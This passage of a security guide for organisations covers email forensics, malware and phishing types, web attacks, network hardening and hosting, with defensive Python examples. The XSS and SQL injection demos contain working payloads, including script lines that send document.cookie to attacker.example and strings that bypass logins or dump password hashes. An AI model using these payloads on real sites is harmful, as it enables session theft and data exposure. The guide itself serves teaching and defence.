    • Substituting letters with similar or identical characters from other scripts, which may appear the same to the human eye but are read differently by computers; for example, the Latin letter "a" and the Cyrillic letter "а" look alike but are different characters to a computer.

Blocked IP addresses and domains lists

When an IP address from the email header's "Received" field and the domain in the email address are identified, their authenticity can be analysed using websites that maintain updated lists of blocked IP addresses and domains:

  • MultiRBL – checks an IP address against many public blocklists at once.
  • Autonomous System Lookup – offers information about the internet service provider associated with the IP addresses.
  • Spamhaus – combines and contains one of the most comprehensive lists of blocked IP addresses.

Body (content) analysis of the email

In addition to analysing the email header, it is crucial to examine the text of the email. The key is to determine the legitimacy of the email and verify whether it genuinely originates from the claimed sender. The goal is to establish the email's credibility.

Reviewing the body of the email involves analysing the message's content, including text, attachments, images, and links, to identify phishing elements. Typical phishing elements include fake links, requests to log in to a counterfeit page, or demands for money. Analysing links is crucial to ascertain whether they direct to fake pages.

Examining the content may also involve linguistic analysis, which can be useful in identifying the tone of the message and the emotional reactions it is meant to provoke. This analysis can help establish the intentions and motives behind sending the message.

When analysing URL addresses in an email, it's crucial to avoid accidentally clicking on the link. Instead, users should search for the original page in the internet browser and compare its URL with the link provided in the email. Numerous useful tools are available for link analysis, such as PhishTank.

Attachment analysis

The first step in this phase is to analyse the file format or its extension. Some malicious files carry stacked extensions, such as .pdf.zip, or no extension at all. Certain extensions are often used for malicious files; however, the presence of such an extension indicates that the file might be dangerous, not that it definitely is. Here are some examples:

  • .zip: Commonly used for compressing and archiving files, functionality that can be exploited to mask malicious software within the file.
  • .exe: Indicates an executable program and may be used to install malware.
  • .bat: Used for batch scripts and can contain commands that execute malware.
  • .vbs: Used for Visual Basic scripts, which can be malicious.
  • .js: Known extension for JavaScript files, which may contain malicious code.
  • .msi: Extension for Microsoft Installer files, which can be used to install malware.
  • .scr: Used for screensaver files, which can be disguised as something else but actually contain malicious code.
  • .dll: Extension for dynamic libraries, often used for attacks on software vulnerabilities.

When analysing links and attachments, caution should be exercised to avoid accidental clicks, and it's essential to use antivirus software that detects and prevents malicious files.
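To show how the header fields described under "Header analysis" and the extension checks above are pulled out in practice, here is an added Python example (not code from the guide) that parses a constructed phishing-style message with the standard library. The sample headers, the documentation-range IP addresses and the PLACEHOLDER DKIM values are constructed, and RISKY_EXTENSIONS is simply the list above.

```python
import email
import re
from email.utils import parseaddr, parsedate_to_datetime

# Constructed sample (not a real message): spoofed From, a DKIM signing domain that
# differs from it, two Received hops and a double-extension attachment.
RAW_EMAIL = b"""\
Received: from mx.receiver.example (mx.receiver.example [203.0.113.7])
\tby inbox.receiver.example with ESMTP id abc123;
\tTue, 5 Mar 2024 10:15:32 +0000
Received: from mail.g00gle-support.example (unknown [198.51.100.42])
\tby mx.receiver.example with ESMTPS;
\tTue, 5 Mar 2024 10:15:30 +0000
DKIM-Signature: v=1; a=rsa-sha256; d=g00gle-support.example; s=mail;
\th=from:to:subject; bh=PLACEHOLDER; b=PLACEHOLDER
From: "Google Security" <alerts@google.com>
To: editor@receiver.example
Date: Tue, 5 Mar 2024 10:15:29 +0000
Message-ID: <20240305101529.12345@g00gle-support.example>
X-Mailer: PHPMailer 6.8
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: application/zip; name="statement.pdf.zip"
Content-Disposition: attachment; filename="statement.pdf.zip"
Content-Transfer-Encoding: base64

UEsFBgAAAAAAAAAAAAAAAAAAAAAAAA==
--b1--
"""

# Extensions the guide lists as frequently abused for malicious attachments.
RISKY_EXTENSIONS = {"zip", "exe", "bat", "vbs", "js", "msi", "scr", "dll"}

IP_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def unfold(value):
    """Collapse folded header continuation lines into one space-separated line."""
    return " ".join(value.split())


def received_chain(msg):
    """Return Received hops oldest first: each server prepends its own header,
    so the top-most Received line is the last hop and the bottom one the first."""
    return [unfold(h) for h in reversed(msg.get_all("Received", []))]


def dkim_tags(msg):
    """Parse the tag=value pairs of DKIM-Signature (d= is the signing domain)."""
    sig = msg.get("DKIM-Signature")
    tags = {}
    for item in unfold(sig or "").split(";"):
        if "=" in item:
            key, _, val = item.strip().partition("=")
            tags[key.strip()] = val.strip()
    return tags


def attachment_flags(filename):
    """Flag the naming tricks the guide describes: no extension, stacked
    extensions such as .pdf.zip, and extensions commonly used for malware."""
    exts = [p for p in filename.lower().split(".")[1:] if p]
    if not exts:
        return ["no-extension"]
    flags = []
    if len(exts) > 1:
        flags.append("double-extension")
    if exts[-1] in RISKY_EXTENSIONS:
        flags.append("risky-extension")
    return flags


def analyse(raw):
    """Summarise the header and attachment findings of one raw message."""
    msg = email.message_from_bytes(raw)
    _, from_addr = parseaddr(msg.get("From", ""))
    from_domain = from_addr.rpartition("@")[2].lower()
    hops = received_chain(msg)
    tags = dkim_tags(msg)
    attachments = {}
    for part in msg.walk():
        if part.get_content_disposition() == "attachment":
            name = part.get_filename() or ""
            attachments[name] = attachment_flags(name)
    return {
        "from_address": from_addr,
        "message_id": msg.get("Message-ID"),
        "x_mailer": msg.get("X-Mailer"),
        "sent_at": parsedate_to_datetime(msg["Date"]).isoformat(),
        "hops": hops,
        # the IP in the first hop is the server that handed the mail in
        "first_hop_ips": IP_IN_BRACKETS.findall(hops[0]) if hops else [],
        "dkim_domain": tags.get("d"),
        # A DKIM signature only proves that the d= domain signed the message; when
        # that domain differs from the From domain it does not vouch for the sender.
        "dkim_matches_from": tags.get("d", "").lower() == from_domain,
        "attachments": attachments,
    }
```

For a real message, paste the text shown by "Show original" into a file and pass its bytes to analyse().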

Useful tools

VirusTotal allows the analysis of suspicious attachments, links, IP addresses, and domains to detect whether something is infected with malicious software. Information copied into this tool is automatically shared with the security community, so care should be taken not to copy files containing confidential information. The tool offers a premium option.

PhishTool is an automated tool for analysing potential malicious emails. Instead of individually analysing and going through all the steps mentioned, a potentially malicious email can be forwarded to PhishTool for analysis. There is an option to link the account on this service with a VirusTotal account. A free version of the PhishTool tool is also available for download and use.

Good security practices

No matter what you do online, you should always try to follow general good security practices:

  • Be very careful with your personal data;
  • Respect the privacy of others on the internet;
  • Only download files and install software from known and trusted sources;
  • Regularly update all software and the operating system of your devices to reduce the risk of attacks;
  • Create unique and complex passwords and securely store them in password managers;
  • Enable multi-factor authentication for your online accounts wherever possible;
  • Use anti-virus/anti-malware software;
  • Encrypt everything you can encrypt;
  • If you have to use a public computer, try not to leave any traces (e.g., downloaded files, account logins, browsing history) behind;
  • If your USB flash drive was in a public or unprotected computer, be sure to scan it with anti-virus/anti-malware software before using it again. It is generally recommended that portable devices, e.g., USB flash drives or external hard drives, are scanned each time they are connected to a computer;
  • Take into account the consequences of your every action on the internet; privacy does not mean less responsibility;
  • At least quickly read through the Terms of Use/Service before clicking "I accept".

Bad security practices

Habits are hard to change, but you should try your best to avoid these bad security practices:

  • Never send passwords, personal data or financial information via plain text email.
  • Do not access networks or other systems for which you do not have authorization, even if you have somehow obtained certain login credentials (username, password). This does not mean that you have been authorized to use them.
  • Do not install suspicious add-ons and software updates.
  • Be wary of suspicious links you received via email, no matter how interesting the message may seem. It is better to be safe than sorry.
  • Avoid using public or unprotected computers.
  • Avoid using other people's mobile devices.
  • Don’t write your passwords on a publicly displayed Post-it note. Seriously, don't!
  • Don’t use the names or dates of birth of people close to you as passwords.
  • Don’t leave your devices unattended and unlocked.
  • Don’t ignore suspicious activities - sometimes it’s better to be paranoid.
  • Do not use pirated software, i.e. software packages that have some type of security or product registration circumvention built in. If you do not want to pay for software, look for a free and open-source alternative.
  • Don't live in your comfort zone. Sometimes it is worth investing a little time and effort and learning the basics of how to be safe on the internet.

Tor and VPN

The internet commonly provides a false sense of anonymity, whereas there is only pseudo-anonymity for most users. Pretty much everyone is identifiable online by their IP address, a unique identifier assigned to you by your internet service provider (ISP).

However, there are tools that can help you mask your actual IP address and provide an additional layer of protection for your online identity. This can be achieved with the use of Tor Browser or Virtual Private Network (VPN) services.

Tor Browser is free and open-source software based on Mozilla Firefox and customised to work with the Tor network. It encrypts your browsing traffic, hides the sites you access from your internet provider, and hides your IP address from the websites you visit. It is also particularly useful for accessing websites blocked on your network. There are some drawbacks, however: the Tor network generally provides slow internet speeds, and users' identity can be exposed if they do not use Tor Browser properly.

Virtual Private Network (VPN) is a service that enables users to connect to the public internet through a private network, providing an additional encrypted layer of privacy and masking the users’ actual IP address. Even though it helps you stay more private from the ISP and (implicitly) the government while browsing the internet, a VPN connection does not protect you from other dangers lurking online, such as malware, social engineering, or spyware. There are many VPN providers, but users should still take note and be aware of possible security aspects such as:

  • Jurisdiction, i.e. in which country is the company providing VPN services based. Understand the jurisdiction in which the VPN provider and their infrastructure is based and whether this poses a legal risk for you;
  • No logs policy, meaning that the VPN provider doesn’t log your internet traffic made through their network;
  • Regularly performed independent security audits, which are usually documented on the VPN provider’s website;
  • Price, as some VPN services can be quite expensive. Be wary of “completely free” VPN apps, though, as their business model is almost certainly based on tracking users. However, some paid service providers offer free plans with limited possibilities, such as lower speeds and a smaller number of servers.

Browser add-ons

There are ways to improve your internet browsing experience and make you safer while you use your favourite online services. Modern internet browsers, such as Mozilla Firefox, Brave, or Google Chrome, have software widgets (add-ons/extensions) that provide additional options and benefits for your browser. Here are some of the best:

  • Privacy Badger: An extension that enables you to block advertising trackers from third parties on websites you visit.
  • Facebook Container (Firefox only): It isolates your Facebook identity in a container tab, making it harder for Facebook to track your visits to other websites with third-party cookies.
  • uBlock Origin: A resource-friendly multi-purpose blocking extension designed to block ads, tracking, and malware domains.

What is malware

Malware (malicious software) is a general term for software used to interfere with a computer, gather sensitive information, or gain access to a protected information system. This type of software is created and used by cybercriminals and other malicious actors, even governments, to intentionally harm an information system and/or steal information from it. In some cases, the goal of malware isn’t to harm a system but to scare the person using it.

Most malware consists of one or more files and behaves like a program or an app, but there is also malware that runs entirely in memory.

Malware can be classified by how it infects systems or by what it does on the system.

Recognising malware

Different kinds of malware place different demands on the actors behind them when it comes to avoiding detection. For example, to be successful, wipers and infostealers only need to be active for a very short time, while ransomware needs to stay active until all the files are encrypted, after which it clearly announces its presence on the system. On the other hand, spyware, RATs and adware need to remain hidden for a long time to be successful for their operators.

It is not always easy to recognise malware, as it often happens that users are initially unaware that their device or system is infected. Sometimes malware activity can be noticed due to spontaneous deterioration of system performance, but not all malware affects performance and certainly not every deterioration of system performance is caused by malware.

The average user certainly cannot be expected to completely remove malware on their own without the use of specific anti-malware software. These programs monitor the system, scan the files downloaded from the internet and email, and if they find any malware, they quarantine it or delete it, depending on the settings.

However, it is not enough to just install a specific application that will scan and remove malware - it is also important that users do not install untrusted applications, click on suspicious links, open suspicious emails, or visit unreliable websites.

The Classics

The most classic kind of malware is a virus, which attaches itself to existing files by making a small modification and changing the file’s behaviour. Viruses are very rare these days, but the term is sometimes used for any kind of malware.

A worm is malware that automatically spreads to other systems. Worms still exist, but they are less common than they once were.

A trojan (or trojan horse) is malware that pretends to be a legitimate program and thus tricks the user into installing or executing it. For example, cracked versions of paid software often include trojans.

Data attackers

There are a great many things malware can do. Some of them are very destructive, such as wipers, which delete all files on a system or network, or ransomware, which encrypts files and demands an often large ransom to decrypt them. Wipers are often used for political purposes, while ransomware is a very profitable operation for cybercriminals.

Command and control

A RAT (short for Remote Access Trojan) is malware that gives a rogue operator access to a system. You can think of a RAT as a kind of TeamViewer, but used for malicious purposes. The term backdoor is also used for this kind of malware, though that term also covers remote access built into a system, either by mistake or in secret.

A downloader is malware that downloads other malware. Many malware infections take place in multiple phases, where each piece of malware downloads the next until the final one performs the real task. For the malware operators, this has the advantage that the malware is more likely to stay hidden, while also allowing different kinds of malware to be delivered to different systems.

Finally, a collection of systems infected with the same malware and operated by a single operator is called a botnet. In that case, individual systems in the botnet are referred to as bots.

Espionage

Spyware is malware that spies on a system and thus, implicitly, on its user. Depending on the type of spyware and the device on which it runs, it can give access to someone’s private messages, microphone, or location.

An infostealer steals information from a system, such as passwords, credit cards, or cryptocurrency wallets. A keylogger steals anything typed on a keyboard.

Malvertising and scams

Adware is malware that displays ads, and closely related to it is malware that uses your computer to silently click on ads. Both are relatively harmless for the infected system, but sometimes adware is used to download more damaging malware. Moreover, the fact that adware was installed in the first place suggests a mistake was made somewhere.

Some malware is used to engage in behaviour targeting other systems, by taking part in DDoS attacks, sending spam, or acting as proxies. The main risk for infected systems here is the use of resources, which can be costly, and the risk of the IP address ending up on blocklists.

Finally, scareware is malware that pretends to be harmful but only scares the user. For example, scareware may claim to be ransomware and demand a ransom, or claim to be a warning from the police that requires a fine to be paid.

DDoS

According to the most general classification, technical attacks are carried out either without direct access to the server or with access to it. The first group mostly consists of incidents whose main goal is to prevent access to the content of the site.

There are several ways to take a server down, and the most commonly used is a DDoS (Distributed Denial of Service) attack. This means that a huge number of devices simultaneously send requests to the attacked server, which cannot answer all of them and simply stops responding. After the attack stops, in most cases the server and the site work normally again.

Ransomware

Ransomware is a form of malware which encrypts files on anything from a single computer all the way up to an entire network, including servers, so that the files cannot be accessed without a decryption key. The attackers then ask for payments in cryptocurrency to provide targets with the decryption key, usually within a short time frame to put more pressure on the targets. This is a very dangerous type of malware, as it can lead to critical damage to an entire information system. The system can be restored from backups, but the administrators should first check for any remaining traces of ransomware. In addition to encrypting files, the attackers can also employ data exfiltration techniques to steal data and threaten to publish them in case they don’t receive their payment.

Phishing

Phishing is focused on exploiting the lack of knowledge or gullibility of the target and is mostly done by email. It is commonly used for various scams, such as the famed "Nigerian Prince", for infecting devices with malware, or for gaining access to sensitive information, such as financial data or login credentials. Potential targets are sent a fraudulent message which is made to look authentic, as if it came from someone in a position of authority, such as a bank or the police. The recipient is then asked to open the attached file or click on a link in order to do something very important, e.g. to update bank account information or review a received payment.

Types of phishing emails

Phishing attacks represent a cybersecurity threat that can manifest not only through email but also through phone calls or text messages. Attackers pose as a legitimate institution or a trusted person to deceptively extract sensitive information from their potential target. This could include identity information, banking, and credit card data, or passwords for accessing protected resources through which the attacker can compromise devices and entire information systems. Phishing is often used as an introduction to various types of cyber attacks, such as ransomware attacks or the installation of spyware (malicious programs for device espionage).

There are different types of malicious emails, broadly classified into two groups: targeted phishing emails and phishing campaigns. Targeted phishing involves specifically crafted emails for specific employees of a particular organisation to obtain desired information. Phishing campaigns rely on mass distribution, with emails composed to be sent randomly to a larger number of people. Targeted phishing messages are more challenging to detect because they are carefully crafted to appear authentic, while mass-sent emails are easier to recognize due to typical characteristics. However, in both cases, email forensics is a valuable skill.

Common characteristics of a phishing email:

  • Typically demands urgent action.
  • Contains either a link or an attachment.
  • Inconsistency in the sender's email address with the email address of the person or organisation the attacker is impersonating.
  • Inconsistency in the URLs of websites and domains.
  • Inconsistency in the extensions of documents attached.
  • Requests disclosing credentials, sensitive data, personal information, credit card information, etc.

Communications interception

Interception of communication (voice, video, text chats, internet traffic) is also a risk, as there are actors such as intelligence agencies and criminals with advanced capabilities and resources to conduct surveillance of unencrypted communications channels. Issues such as government hacking are becoming increasingly dangerous for citizens’ communications privacy due to the growing surveillance industry, which keeps developing and selling one advanced product after the next.

Spyware attacks

Advanced spyware tools are increasingly used to infect smartphones of high-value targets, such as journalists, politicians, dissidents, businesspeople, etc. By leveraging vulnerabilities in mobile operating systems (iOS and Android) and apps with technically sophisticated and expensive exploits, this spyware can pull practically all data from the phone or effectively turn it into a surveillance device with remote microphone or camera activation. It is very difficult for a person to discover whether their phone is infected without a forensic analysis. Spyware products such as Pegasus and Predator have gained notoriety in recent years, but it is plausible that there are many more such tools out there.

Code injection

Code injection is a family of attacks in which the attacker supplies input, through a form field, a URL parameter or any other input the site accepts, that the site then interprets as code or as part of a query instead of as plain data. Depending on the target, the injected code can read or modify data, hijack user sessions, or simply tie up the database and server with expensive operations that produce no visible result until the site stops responding. After such an attack the site may be unusable and has to be restored from the last clean copy, which is why regular backups of the site are rightly considered an elementary security procedure.

Cross-site scripting (XSS) targets the users of a vulnerable web application rather than the server itself, i.e. it compromises regular users' interaction with the website. The attacker gets malicious JavaScript into a page the site serves (through a stored comment, a crafted link, or a URL parameter that the site reflects into the page without escaping), so the victim's browser runs it with the site's own privileges. A successful attack can steal the user's session cookies or credentials, perform actions on their behalf, or, if the targeted user has administrative access, hand the attacker control of the website.
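To make the mechanism concrete, here is an added example (not code from the original page) in Python, modelling a server that reflects a search term into a page: the vulnerable render function pastes the input into the HTML, the fixed one escapes it, and the two constructed payloads show a script tag in text context and a breakout from a quoted attribute. The page template, the attacker.example host and the payloads are assumptions made for the example.

```python
import html
import re

# Hypothetical search results page; {q} is filled from the request's ?q= parameter and
# lands in two contexts: HTML text and a single-quoted attribute value.
TEMPLATE = ("<html><body><h1>Results for: {q}</h1>"
            "<input name='q' value='{q}'></body></html>")


def render_unsafe(query: str) -> str:
    """Vulnerable: the user-controlled string is inserted into the HTML verbatim."""
    return TEMPLATE.format(q=query)


def render_safe(query: str) -> str:
    """Fixed: <, >, &, \" and ' are escaped, so the browser renders the string as text."""
    return TEMPLATE.format(q=html.escape(query, quote=True))


def value_attribute(page: str) -> str:
    """What a browser would take as the input's value='...' attribute."""
    match = re.search(r"value='([^']*)'", page)
    return match.group(1) if match else ""


# Constructed attacker inputs: one for the text context, one that closes the quoted
# attribute early and registers an event handler that fires when the field gets focus.
SCRIPT_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
ATTRIBUTE_PAYLOAD = "' autofocus onfocus='fetch(\"https://attacker.example/?c=\" + document.cookie)"
```

Escaping must match the context the value lands in: html.escape with quote=True covers text and quoted attributes, but a value placed inside a script block or an unquoted attribute needs different treatment, which is why templating engines with automatic, context-aware escaping are preferable to hand-built strings.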

SQL injection interferes with the queries a website sends to its database (SQL is the standard language for querying relational databases) in order to reach data stored in it, including data that ordinary user queries are never meant to expose, such as user personal data and login credentials. When user input is pasted directly into a query instead of being passed as a parameter, an attacker can change the query's logic, read stored data and, in some cases, modify or delete it. Depending on the database configuration, SQL injection can also be escalated to run commands on the server hosting the database.
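The following Python example, added here and not taken from the original page, shows the same login query built by string concatenation and by parameter binding, run against a constructed SQLite table. The three attacker inputs are assumptions chosen to demonstrate bypassing the password check, logging in as a chosen user, and reading a column the login was never meant to expose.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory user table; real systems store salted password hashes, not labels."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users (username, password_hash) VALUES (?, ?)",
                     [("alice", "hash-of-alice"), ("admin", "hash-of-admin")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> list[str]:
    """Vulnerable: user input is pasted into the SQL text, so quotes and comments rewrite the query."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password_hash = '{password_hash}'")
    return [row[0] for row in conn.execute(query)]


def login_safe(conn: sqlite3.Connection, username: str, password_hash: str) -> list[str]:
    """Fixed: the query text is constant and the values travel separately as bound parameters."""
    query = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return [row[0] for row in conn.execute(query, (username, password_hash))]


# Constructed attacker inputs typed into the username field.
BYPASS = "' OR 1=1 --"                                   # comments out the password check
TARGETED = "admin' --"                                   # logs in as a chosen user
DUMP = "' UNION SELECT password_hash FROM users --"      # reads a column the login never exposes
```

With parameters bound, the database engine receives the attacker's text as a value to compare against, never as SQL, so the same inputs simply match no row.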

Account hacks

Account hacks are also a common threat, since social media, email, e-banking and other online services hold information that is very valuable to an attacker. What looks like an account malfunction, and may be mistaken for a malware infection, can turn out to be a hacked account. An account is typically hacked through a combination of social engineering and technical skills: for example, a fraudulent message demands that the user update their login credentials for a specific service and leads them to a look-alike website controlled by the attacker, which collects the current credentials; the attacker then logs in, changes the password and recovery details, and locks the legitimate user out. Multi-factor authentication can be bypassed by SIM swapping (if SMS is used as the second factor) or by stealing session cookies from the user's browser. Although a stolen session only gives access until it expires or is revoked, and reveals no password, it is enough to read and send content as the user. Malicious browser extensions are a common source of such session hijacks.

Trojan attacks

Trojans delivered through social engineering account for a large share of infections. Users typically pick them up on obscure websites where they accept a fake warning that their computer is "infected" and install a bogus antivirus, which is the trojan itself. Millions of attacks are carried out this way every year, which is what gives trojans their lead over other kinds of attack. The best protection is education and up-to-date information about current forms of threats. In organisations the problem is partly mitigated by filtering which websites can be reached from computers on the local network.

Data centre and cloud

Keeping functions separated, as a measure of physical protection, is a key condition for the security of a system: data should not be stored on the same machine that serves it to the network or on which it is processed. There are several ways to store large amounts of data. The simplest is an external hard drive. External drives with good performance are affordable, but this kind of hardware has no built-in redundancy: if the drive fails, most of the data on it is lost for good. On the other hand, an external drive is not directly reachable from the internet and is only active while connected to a computer, so it can be considered relatively secure. Storing data on an external drive also means the data stays within the organisation's physical premises.

From a data-loss perspective, renting storage space in the cloud is a much better way to keep important data. Cloud computing is the remote use of computing resources (bandwidth, storage, memory, etc.) shared among many applications and users; a cloud can be private, public or hybrid. Cloud providers store data redundantly, for example on RAID arrays (Redundant Array of Independent Disks) that keep each piece of data on more than one disk, mirrored or protected by parity, and by replicating it across locations, so a single failure does not cause data loss. Some cloud storage solutions are Nextcloud, Dropbox, Proton Drive, Tresorit, etc.

The third option is to build your own mini data centre, storing all data of importance to the organisation on your own premises. The equipment depends on need; there are a number of ready-made solutions, such as network-attached storage (NAS) appliances from vendors like QNAP, that are affordable and can settle the issue permanently. The data then remains within the organisation's physical space, and RAID reduces the risk of data loss from disk failure. Note that RAID protects against hardware failure, not against theft, ransomware or accidental deletion, so a separate backup is still needed.

Internal network

In one system (company, newsroom) all computers, printers, storage devices (storage servers or mini data centres), mail servers, routers and other components are connected to the internal, local network, physically (by cable) and/or wirelessly (Wi-Fi). These networks are usually based on the so-called client-server architecture. A client or user is a computer or other hardware component in everyday use, while a server is a special computer that allows clients to use the resources stored on it. These can be applications, web pages, files, emails, databases, etc. There are different types of servers: web server, file server, mail server, database server, etc. Due to the high concentration of sensitive data in this network, special protection measures are applied to it.

A wireless network's physical range depends on the strength of the transmitted signal. Indoors the range is typically around twenty metres from the router, which often means the network is reachable outside the room or building. Routers that emit a wireless signal offer several layers of protection, and configuring them, including the measures below, is the administrator's job.

The most common protection measures for wireless networks:

  • Wireless security mode: Use WPA2 (Wi-Fi Protected Access 2), or WPA3 where the router and devices support it, and never the obsolete WEP or original WPA. WPA2 comes in two variants. PSK (Pre-Shared Key) is set up simply by choosing a password, while Enterprise requires a more involved setup and an additional RADIUS (Remote Authentication Dial In User Service) server, but gives each user their own credentials. In most cases PSK is good enough for small and medium organisations, provided the password is long and random. Many routers also support WPS (Wi-Fi Protected Setup), which lets a device join the network by pressing a button on the router or entering a short PIN instead of the password. WPS has serious known flaws (the PIN can be brute-forced), so it should be turned off on the router;
  • MAC filtering: a MAC address is the hardware address of the device that connects to the network, and the router can be configured to allow only addresses on its list. This will not stop a capable attacker, who can observe the MAC addresses of connected devices over the air and spoof one of them. It also prevents people, including staff, from connecting new devices (such as a new phone) without the administrator's involvement, which can be inconvenient;
  • Hiding the SSID (service set identifier): the SSID is the network name, which is normally broadcast. As with MAC filtering, hiding it will not stop a capable attacker, but it does keep casual snoopers from playing with someone else's network;
  • Using multiple wireless networks is recommended when there are at least two categories of people for whom the network is intended, for example employees and guests. Modern wireless routers usually have the option to create a separate guest network.

General infrastructure protection

Here are some general recommendations on infrastructure protection:

  • Routers and firewalls can be configured to frustrate footprinting, the automated collection of information about a system. Footprinting means building a sketch of the network from the responses it gives to probes: mapping the routes data takes (traceroute), finding active devices (ping sweeps) and scanning for open ports can reveal the entire infrastructure to an attacker, i.e. the number and type of routers and computers and the way they are connected. The diagnostic protocols themselves, ICMP in particular, are therefore a major source of information for attackers. Good practice is to allow ICMP requests to the public web server and to configure the other servers and the internal network to reject them;
  • Unnecessary services should be disabled on each server. For example, everything on the mail server can be blocked except the protocols used for email (SMTP, IMAP, POP, etc.), while web servers can be configured so that only public resources are accessible. Access to other folders and files, and to the administrative part of the site, should be restricted to avoid unauthorised access and data leakage;
  • Close ports that no application on the server uses, by configuring the firewall accordingly;
  • Intrusion detection and prevention systems identify suspicious traffic, block it where configured to do so, and log footprinting attempts so that they can be reviewed;
  • Using anonymous registration services, information about the domain registrant can be hidden. However, it should be borne in mind that the reputation of a credible organisation is built through transparency, and this technique is not recommended in every situation.
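As an added example (not from the original page), the following Python script shows what logging footprinting attempts can look like at the simplest level: it reads firewall drop messages in the kernel's netfilter log format, groups them by source address, and raises an alert when one source touches many distinct TCP ports or sends ICMP echo requests (type 8) to many hosts within a sliding time window. The log lines are constructed for the example, and the window and thresholds are assumptions to be adjusted to the network's normal traffic.

```python
from collections import defaultdict
from datetime import datetime


def parse_line(line: str):
    """Parse one iptables/nftables-style kernel log line into a dict, or None if it is not one."""
    try:
        ts = datetime.strptime(line[:15], "%b %d %H:%M:%S")
    except ValueError:
        return None
    fields = dict(tok.split("=", 1) for tok in line[15:].split() if "=" in tok)
    if "SRC" not in fields or "PROTO" not in fields:
        return None
    return {"ts": ts, "src": fields["SRC"], "dst": fields.get("DST", ""),
            "proto": fields["PROTO"], "dpt": fields.get("DPT"), "type": fields.get("TYPE")}


def detect_recon(log_lines, window_s=60, port_threshold=10, host_threshold=5):
    """Return sorted (source, kind) alerts: many distinct TCP ports, or many hosts probed
    with ICMP echo requests (TYPE=8), from one source inside a sliding time window."""
    by_src = defaultdict(list)
    for line in log_lines:
        event = parse_line(line)
        if event:
            by_src[event["src"]].append(event)
    alerts = set()
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        start = 0
        for end, event in enumerate(events):
            # Advance the window start until every event in it is within window_s of this one.
            while (event["ts"] - events[start]["ts"]).total_seconds() > window_s:
                start += 1
            window = events[start:end + 1]
            ports = {(e["dst"], e["dpt"]) for e in window if e["proto"] == "TCP"}
            pinged = {e["dst"] for e in window if e["proto"] == "ICMP" and e["type"] == "8"}
            if len(ports) >= port_threshold:
                alerts.add((src, "port-scan"))
            if len(pinged) >= host_threshold:
                alerts.add((src, "ping-sweep"))
    return sorted(alerts)


def sample_log() -> list:
    """Constructed log lines (not a real capture): a port scan, a ping sweep,
    an ordinary client talking to port 443, and an unrelated sshd line."""
    drop = "Mar 10 12:00:{sec:02d} fw kernel: DROP IN=eth0 OUT= SRC={src} DST={dst} PROTO={proto}"
    lines = [drop.format(sec=i, src="203.0.113.5", dst="198.51.100.10", proto="TCP")
             + f" SPT=40000 DPT={21 + i}" for i in range(15)]
    lines += [drop.format(sec=20 + i, src="203.0.113.9", dst=f"198.51.100.{i + 1}", proto="ICMP")
              + " TYPE=8 CODE=0" for i in range(6)]
    lines += [drop.format(sec=30 + 10 * i, src="192.0.2.7", dst="198.51.100.10", proto="TCP")
              + " SPT=51000 DPT=443" for i in range(3)]
    lines.append("Mar 10 12:01:00 fw sshd[812]: Accepted publickey for admin from 192.0.2.7 port 51234")
    return lines
```

Only dropped packets are examined here, which is deliberate: a closed-by-firewall port answering nothing is exactly what a scanner probes, so the drop log is where footprinting shows up first; the same logic applies to any host-based firewall that logs its drops.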

Mail server

Emails are considered sensitive data in any organisation. Therefore, it is critical to protect the email server from attacks and other malicious activities.

Besides the content of emails, the metadata generated in everyday communication matters too: the information exchanged between the software and devices that send and receive email (sender, recipient, time, the servers a message passed through, and so on). For an attacker, metadata is often more valuable than the content of the message itself, because it gives accurate information about the digital context of the communication. Metadata is kept on the mail server, so the server needs specific protection. The basic step is to block every protocol and service (for example FTP or HTTP) that the server does not need for its primary function of receiving and sending email. A dedicated server can be rented as part of a hosting package or other services, or an organisation can set up its own server with dedicated mail server software; iRedMail is one example of such software.

Alternatively, organisations can switch to Proton for Business encrypted email solution, which offers special pricing for non-profits.

Domain

Very important aspects of organisational infrastructure management are domain name and hosting, i.e. on which server are the organisational websites hosted and which registrar they registered the domain name with.

There are numerous choices when registering a domain name (e.g. organisation.org) and it can be done relatively cheaply and easily online, depending on the needs of the organisation. Domain names are usually registered on a yearly basis and registration must be regularly renewed.

Organisations can opt for different types of top level domains, i.e. the ending part of the URL, and most common are:

  • Country code (ccTLD), which are associated with a specific country, region or territory: .de, .br, .ca;
  • Generic (gTLD), related to general notions: .com, .net, .org;
  • Sponsored (sTLD), reserved for specific types of registrants, such as government bodies or international organisations: .gov, .int, .aero.

When registering a domain, there is also the option of Whois domain protection, so that the registrant’s information (name, address, contacts...) wouldn’t be visible in Whois lookup searches. However, for organisations such as media, domain transparency is recommended.

Hosting

Websites can be hosted domestically, i.e. in the country where the organisation operates, or internationally. Both options are equally viable, but have some specifics to them:

  • Domestic hosting
    • Better availability of technical support that does not depend only on reporting and online communication;
    • Liquidity and reputation of hosting providers can be checked in the local community;
    • There is no application of legal provisions pertaining to international personal data transfers;
    • If a site targeting domestic audiences is under DDoS attack from abroad (which is usually the case) it can remain stable and accessible to domestic users by temporarily blocking foreign IP addresses.
  • Foreign hosting
    • The server where the site is hosted is outside the jurisdiction of state authorities in the organisation’s country;
    • Domestic legislation does not apply to foreign hosting companies, so legal and administrative procedures related to the hosted content can be complicated and uncertain.

In terms of technical aspects of hosting, there are four types:

  • Shared hosting is based on sharing resources: different sites on the same server share the processor, bandwidth, disk space, and so on. If one site on the server receives a surge of requests, the performance of the other sites suffers, and a compromise of one site can put its neighbours at risk;
  • Virtual Private Server (VPS) hosting gives each customer their own resources. Technically, several virtual servers run on one physical server, each with resources it does not share with the others, and an attack on one virtual server does not directly affect the others;
  • A dedicated server gives the customer exclusive use of the machine for any purpose. Virtual machines can be set up on it for different roles, such as web hosting, email and data storage;
  • Cloud hosting runs the site on multiple servers connected to act as one, i.e. on cloud infrastructure, which decentralises the system and makes it more resilient: if one server fails, the others take over its role and the site keeps working.

